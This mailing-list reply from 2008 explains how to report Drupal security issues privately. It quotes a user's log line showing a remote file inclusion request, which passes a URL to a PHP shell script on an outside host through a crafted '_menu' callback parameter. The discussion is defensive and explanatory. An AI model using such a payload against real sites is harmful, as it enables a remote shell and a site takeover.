Hi,
The most important thing here is that when you have a potential security issue the proper way to submit it is documented on http://drupal.org/security-team which can also be found via http://drupal.org/security If you send the potential exploit to a public channel like a listserve or the Drupal.org issue queue, then that makes the job of the security team and all other Drupal users much harder because everyone has to scramble to find a fix and get it installed as soon as possible.
On Jan 6, 2008 6:17 PM, michel michel@ziobudda.net wrote:
drupal/?_menu[callbacks][1][callback]=http://my3dwork.com/images/on.txt?
where http://my3dwork.com/images/on.txt is a php shell script.
any 0-day bug ?
This is not a bug in Drupal per se, but rather a PHP bug. Because the Security Team was seeing a few reports of logs like this we decided to make a "Public Service Announcement" back in October - http://drupal.org/node/184313 That announcement describes the nature of the problem and the proper actions to take to prevent the attack from succeeding on your site.
Regards, Greg